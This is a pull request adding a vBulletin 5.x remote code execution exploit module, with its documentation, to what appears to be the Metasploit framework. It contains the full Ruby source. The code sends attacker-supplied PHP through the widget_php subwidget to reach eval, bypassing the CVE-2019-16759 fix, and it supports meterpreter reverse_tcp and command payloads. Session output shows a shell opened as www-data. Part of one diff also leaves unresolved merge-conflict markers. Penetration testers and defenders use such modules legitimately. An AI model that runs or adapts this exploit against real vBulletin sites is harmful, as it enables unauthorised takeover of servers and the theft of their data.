### PR TITLE
Vbulletin widget template rce

### DIFF
--- a/documentation/modules/exploit/multi/http/vbulletin_widget_template_rce.md
+++ b/documentation/modules/exploit/multi/http/vbulletin_widget_template_rce.md
@@ -1,0 +1,59 @@
+## Vulnerable Application
+
+  [vBulletin](https://www.vbulletin.com) A popular PHP bulletin board and blog web application.
+  This module has been tested successfully against vBulletin 5.6.2 running on Ubuntu Linux 19.04
+
+### Description
+
+This module exploits a logic bug within the template rendering code of vBulletin 5.x. The module 
+uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' 
+template while also providing the 'widget_php' argument which causes the former template to load the 
+latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the 
+exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution 
+on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/http/vbulletin_widget_template_rce```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set VHOST [HOSTNAME]```
+4. Do: ```set LHOST [IP]```
+5. Do: ```set TARGETURI [PATH]```
+6. Do: ```set PAYLOAD [PAYLOADNUM]```
+7. Do: ```run```
+
+## Options
+
+### TARGETURI
+
+The base URI path of vBulletin. **Default: /**
+
+### PHP_CMD
+
+The PHP function to use to execute commands on the target. **Default: shell_exec**
+
+## Scenarios
+
+```
+msf6 > use exploit/multi/http/vbulletin_widget_template_rce
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/vbulletin_widget_template_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/vbulletin_widget_template_rce) > set VHOST vb.local
+VHOST => vb.local
+msf6 exploit(multi/http/vbulletin_widget_template_rce) > set LHOST 0.0.0.0
+LHOST => 0.0.0.0
+msf6 exploit(multi/http/vbulletin_widget_template_rce) > set TARGETURI /
+TARGETURI => /
+msf6 exploit(multi/http/vbulletin_widget_template_rce) > set PAYLOAD 5
+msf6 exploit(multi/http/vbulletin_widget_template_rce) > run
+
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
+[*] Sending php/bind_perl command payload
+[*] Started bind TCP handler against 127.0.0.1:4444
+[*] Command shell session 1 opened (0.0.0.0:0 -> 127.0.0.1:4444) at 2020-08-09 06:29:57 -0500
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```

--- a/documentation/modules/exploit/multi/http/vbulletin_widget_template_rce.md
+++ b/documentation/modules/exploit/multi/http/vbulletin_widget_template_rce.md
@@ -5,22 +5,22 @@
 
 ### Description
 
-This module exploits a logic bug within the template rendering code of vBulletin 5.x. The module 
-uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' 
-template while also providing the 'widget_php' argument which causes the former template to load the 
-latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the 
-exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution 
+This module exploits a logic bug within the template rendering code of vBulletin 5.x. The module
+uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel'
+template while also providing the 'widget_php' argument which causes the former template to load the
+latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the
+exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution
 on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
 
 ## Verification Steps
 
-1. Do: ```use exploit/multi/http/vbulletin_widget_template_rce```
-2. Do: ```set RHOSTS [IP]```
-3. Do: ```set VHOST [HOSTNAME]```
-4. Do: ```set LHOST [IP]```
-5. Do: ```set TARGETURI [PATH]```
-6. Do: ```set PAYLOAD [PAYLOADNUM]```
-7. Do: ```run```
+1. Do: `use exploit/multi/http/vbulletin_widget_template_rce`
+2. Do: `set RHOSTS [IP]`
+3. Do: `set VHOST [HOSTNAME]`
+4. Do: `set LHOST [IP]`
+5. Do: `set TARGETURI [PATH]`
+6. Do: `set PAYLOAD [PAYLOADNUM]`
+7. Do: `run`
 
 ## Options
 

--- a/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
+++ b/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
@@ -8,7 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
-  
+
   HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }
 
   def initialize(info = {})
@@ -16,11 +16,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',
       'Description' => %q{
         This module exploits a logic bug within the template rendering code in vBulletin 5.x.
-        The module uses the vBulletin template rendering functionality to render the 
+        The module uses the vBulletin template rendering functionality to render the
         'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.
         This causes the former template to load the latter bypassing filters originally put in place
-        to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input 
-        allowing the module to achieve PHP remote code execution on the target. This module has been 
+        to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input
+        allowing the module to achieve PHP remote code execution on the target. This module has been
         tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
       },
       'Author' => [

--- a/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
+++ b/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cmd_payload(command)
-    return("echo #{datastore['PHP_CMD']}('#{command}'); exit;")
+    "echo #{datastore['PHP_CMD']}(base64_decode('#{Rex::Text.encode_base64(command)}')); exit;"
   end
 
   def execute_command(command)

--- a/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
+++ b/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
@@ -1,0 +1,140 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  
+  HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',
+      'Description' => %q{
+        This module exploits a logic bug within the template rendering code in vBulletin 5.x.
+        The module uses the vBulletin template rendering functionality to render the 
+        'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.
+        This causes the former template to load the latter bypassing filters originally put in place
+        to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input 
+        allowing the module to achieve PHP remote code execution on the target. This module has been 
+        tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
+      },
+      'Author' => [
+        'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module
+      ],
+      'References' => [
+        ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/']
+      ],
+      'DisclosureDate' => '2020-08-09',
+      'License' => MSF_LICENSE,
+      'Platform' => ['php', 'unix', 'windows'],
+      'Arch' => [ARCH_CMD, ARCH_PHP],
+      'Privileged' => true,
+      'Targets' => [
+        ['Meterpreter (PHP In-Memory)',
+          'Platform' => 'php',
+          'Arch' => [ARCH_PHP],
+          'Type' => :php_memory,
+          'Payload' => {
+            'BadChars' => "\x22",
+          },
+          'DefaultOptions' => {
+            'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+            'DisablePayloadHandler' => false
+          }
+        ],
+        ['Unix (CMD In-Memory)',
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Type' => :unix_cmd,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/generic',
+            'DisablePayloadHandler' => true
+          }
+        ],
+        ['Windows (CMD In-Memory)',
+          'Platform' => 'windows',
+          'Arch' => ARCH_CMD,
+          'Type' => :windows_cmd,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/windows/generic',
+            'DisablePayloadHandler' => true
+          }
+        ]
+      ],
+      'DefaultTarget' => 0,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS]
+      }
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),
+      OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+  end
+
+  def cmd_payload(command)
+    return("echo #{datastore['PHP_CMD']}('#{command}'); exit;")
+  end
+
+  def execute_command(command)
+    response = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/ajax/render/widget_tabbedcontainer_tab_panel'),
+      'encode_params' => true,
+      'vars_post' => {
+        'subWidgets[0][template]' => 'widget_php',
+        'subWidgets[0][config][code]' => command
+      }
+    })
+    if (response) && (response.body)
+      return response
+    end
+
+    return false
+  end
+
+  def check
+    rand_str = Rex::Text.rand_text_alpha(8)
+    received = execute_command(cmd_payload("echo #{rand_str}"))
+    if received && received.body.include?(rand_str)
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("Sending #{datastore['PAYLOAD']} command payload")
+    case target['Type']
+    when :unix_cmd, :windows_cmd
+      cmd = cmd_payload(payload.encoded)
+      vprint_status("Generated command payload: #{cmd}")
+
+      received = execute_command(cmd)
+      if (received) && (datastore['PAYLOAD'] == "cmd/#{target['Platform']}/generic")
+        print_warning('Dumping command output in body response')
+        if received.body.empty?
+          print_error('Empty response, no command output')
+          return
+        end
+        print_line("#{received.body}")
+      end
+
+    when :php_memory
+      vprint_status("Generated command payload: #{payload.encoded}")
+      execute_command(payload.encoded)
+    end
+  end
+end

--- a/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
+++ b/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module
       ],
       'References' => [
-        ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/']
+        ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'],
+        ['CVE', '2020-7373']
       ],
       'DisclosureDate' => '2020-08-09',
       'License' => MSF_LICENSE,

--- a/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
+++ b/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
@@ -12,7 +12,6 @@ class MetasploitModule < Msf::Exploit::Remote
   HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }
 
   def initialize(info = {})
-<<<<<<< HEAD
     super(
       update_info(
         info,
@@ -28,46 +27,10 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module
-=======
-    super(update_info(info,
-      'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',
-      'Description' => %q{
-        This module exploits a logic bug within the template rendering code in vBulletin 5.x.
-        The module uses the vBulletin template rendering functionality to render the
-        'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.
-        This causes the former template to load the latter bypassing filters originally put in place
-        to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input
-        allowing the module to achieve PHP remote code execution on the target. This module has been
-        tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
-      },
-      'Author' => [
-        'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module
-      ],
-      'References' => [
-        ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'],
-        ['CVE', '2020-7373']
-      ],
-      'DisclosureDate' => '2020-08-09',
-      'License' => MSF_LICENSE,
-      'Platform' => ['php', 'unix', 'windows'],
-      'Arch' => [ARCH_CMD, ARCH_PHP],
-      'Privileged' => true,
-      'Targets' => [
-        ['Meterpreter (PHP In-Memory)',
-          'Platform' => 'php',
-          'Arch' => [ARCH_PHP],
-          'Type' => :php_memory,
-          'Payload' => {
-            'BadChars' => "\x22",
-          },
-          'DefaultOptions' => {
-            'PAYLOAD' => 'php/meterpreter/reverse_tcp',
-            'DisablePayloadHandler' => false
-          }
->>>>>>> 19618d9bd259c0f9d3b28b53b0ba41a71420430a
         ],
         'References' => [
-          ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/']
+          ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'],
+          ['CVE', '2020-7373']
         ],
         'DisclosureDate' => '2020-08-09',
         'License' => MSF_LICENSE,

--- a/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
+++ b/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
@@ -12,76 +12,76 @@ class MetasploitModule < Msf::Exploit::Remote
   HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',
-      'Description' => %q{
-        This module exploits a logic bug within the template rendering code in vBulletin 5.x.
-        The module uses the vBulletin template rendering functionality to render the
-        'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.
-        This causes the former template to load the latter bypassing filters originally put in place
-        to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input
-        allowing the module to achieve PHP remote code execution on the target. This module has been
-        tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
-      },
-      'Author' => [
-        'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module
-      ],
-      'References' => [
-        ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/']
-      ],
-      'DisclosureDate' => '2020-08-09',
-      'License' => MSF_LICENSE,
-      'Platform' => ['php', 'unix', 'windows'],
-      'Arch' => [ARCH_CMD, ARCH_PHP],
-      'Privileged' => true,
-      'Targets' => [
-        ['Meterpreter (PHP In-Memory)',
-          'Platform' => 'php',
-          'Arch' => [ARCH_PHP],
-          'Type' => :php_memory,
-          'Payload' => {
-            'BadChars' => "\x22",
-          },
-          'DefaultOptions' => {
-            'PAYLOAD' => 'php/meterpreter/reverse_tcp',
-            'DisablePayloadHandler' => false
-          }
+    super(
+      update_info(
+        info,
+        'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',
+        'Description' => %q{
+          This module exploits a logic bug within the template rendering code in vBulletin 5.x.
+          The module uses the vBulletin template rendering functionality to render the
+          'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.
+          This causes the former template to load the latter bypassing filters originally put in place
+          to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input
+          allowing the module to achieve PHP remote code execution on the target. This module has been
+          tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
+        },
+        'Author' => [
+          'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module
         ],
-        ['Unix (CMD In-Memory)',
-          'Platform' => 'unix',
-          'Arch' => ARCH_CMD,
-          'Type' => :unix_cmd,
-          'DefaultOptions' => {
-            'PAYLOAD' => 'cmd/unix/generic',
-            'DisablePayloadHandler' => true
-          }
+        'References' => [
+          ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/']
         ],
-        ['Windows (CMD In-Memory)',
-          'Platform' => 'windows',
-          'Arch' => ARCH_CMD,
-          'Type' => :windows_cmd,
-          'DefaultOptions' => {
-            'PAYLOAD' => 'cmd/windows/generic',
-            'DisablePayloadHandler' => true
-          }
-        ]
-      ],
-      'DefaultTarget' => 0,
-      'Notes' => {
-        'Stability' => [CRASH_SAFE],
-        'Reliability' => [REPEATABLE_SESSION],
-        'SideEffects' => [IOC_IN_LOGS]
-      }
-    ))
+        'DisclosureDate' => '2020-08-09',
+        'License' => MSF_LICENSE,
+        'Platform' => ['php', 'unix', 'windows'],
+        'Arch' => [ARCH_CMD, ARCH_PHP],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Meterpreter (PHP In-Memory)',
+            'Platform' => 'php',
+            'Arch' => [ARCH_PHP],
+            'Type' => :php_memory,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+              'DisablePayloadHandler' => false
+            }
+          ],
+          [
+            'Unix (CMD In-Memory)',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Type' => :unix_cmd,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/generic',
+              'DisablePayloadHandler' => true
+            }
+          ],
+          [
+            'Windows (CMD In-Memory)',
+            'Platform' => 'windows',
+            'Arch' => ARCH_CMD,
+            'Type' => :windows_cmd,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/windows/generic',
+              'DisablePayloadHandler' => true
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
 
     register_options([
       OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),
       OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])
     ])
 
-    register_advanced_options([
-      OptBool.new('ForceExploit', [false, 'Override check result', false])
-    ])
   end
 
   def cmd_payload(command)
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'subWidgets[0][config][code]' => command
       }
     })
-    if (response) && (response.body)
+    if response && response.body
       return response
     end
 
@@ -123,13 +123,13 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_status("Generated command payload: #{cmd}")
 
       received = execute_command(cmd)
-      if (received) && (datastore['PAYLOAD'] == "cmd/#{target['Platform']}/generic")
+      if received && (datastore['PAYLOAD'] == "cmd/#{target['Platform']}/generic")
         print_warning('Dumping command output in body response')
         if received.body.empty?
           print_error('Empty response, no command output')
           return
         end
-        print_line("#{received.body}")
+        print_line(received.body.to_s)
       end
 
     when :php_memory


### PR DESCRIPTION
This pull request adds a vBulletin 5.x remote code execution module.

This module exploits a logic bug within the template rendering code of vBulletin 5.x. The module uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument which causes the former template to load the latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution on the target. 

This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux 19.04 .

## Verification

1. Do: `use exploit/multi/http/vbulletin_widget_template_rce`
2. Do: `set RHOSTS [IP]`
3. Do: `set VHOST [HOSTNAME]`
4. Do: `set LHOST [IP]`
5. Do: `set TARGETURI [PATH]`
6. Do: `set PAYLOAD [PAYLOADNUM]`
7. Do: `run`

## Example Output

```
msf6 > use exploit/multi/http/vbulletin_widget_template_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set VHOST vb.local
VHOST => vb.local
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set PAYLOAD 5
msf6 exploit(multi/http/vbulletin_widget_template_rce) > run
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending php/bind_perl command payload
[*] Started bind TCP handler against 127.0.0.1:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 127.0.0.1:4444) at 2020-08-09 06:29:57 -0500
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```